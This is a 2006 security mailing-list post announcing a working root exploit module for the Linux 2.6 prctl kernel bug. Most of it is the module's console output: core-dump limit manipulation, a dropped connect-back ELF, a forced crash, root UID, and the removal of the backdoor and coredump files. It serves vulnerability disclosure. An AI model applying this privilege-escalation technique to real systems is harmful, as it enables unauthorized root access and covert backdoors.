Dailydave mailing list archives
DSU
From: Dave Aitel <dave () immunityinc com>
Date: Tue, 11 Jul 2006 09:57:42 -0400
So the 2.6 prctl kernel bug is exploitable to get root. Typically on these sorts of things, you just read what Paul Starzetz has to say on the matter and accept it. But for people who are having problems believing it, we posted an exploit to the partner's page about it.

This is the difference between Linux and Windows. If this had been Microsoft they would have just changed the behavior silently or made it part of some other patch and hoped no one noticed.

Example commandline usage on Linux MOSDEF node:

Linux/MOSDEF$ runmodule DSU -v0 -t127.0.0.1
[C] Running module: DSU
[C] Args: -v0 -t127.0.0.1
Loading DSU ... [ ok ]
[C] ID: 0 Setinfo: > DSU (in progress) <
[C] prctl ok.
[C] RLIMIT_CORE before: [0L, 4294967295L]
[C] setrlimit result: 0
[C] RLIMIT_CORE after: [8192L, 8192L]
[C] prctl ok.
[C] chdir ok.
[C] connectback ELF size: 2998
[C] file wrote successfully
[C] strcpy ok.
[C] fork result: 4830
[C] kill worked.
[C] Segmentation fault (core dumped)
[C] waiting
[C] ROOOOOOOOOOOOOOOOOOT
[C] Self.fd=4
[C] Set up Linux dynamic linking assembly component server Initialized sendint with fd=4
[C] Initialized Local Functions.
[C] Resetting signal handlers...
[C] Reset sigchild
[C] Getting UIDs
[C] backdoor file removed.
[C] coredump file removed.
[C] Done.
[C] ID: 0 Setinfo: > DSU Done <
[C] UID=0 EUID=0 GID=0 EGID=0
Linux/MOSDEF#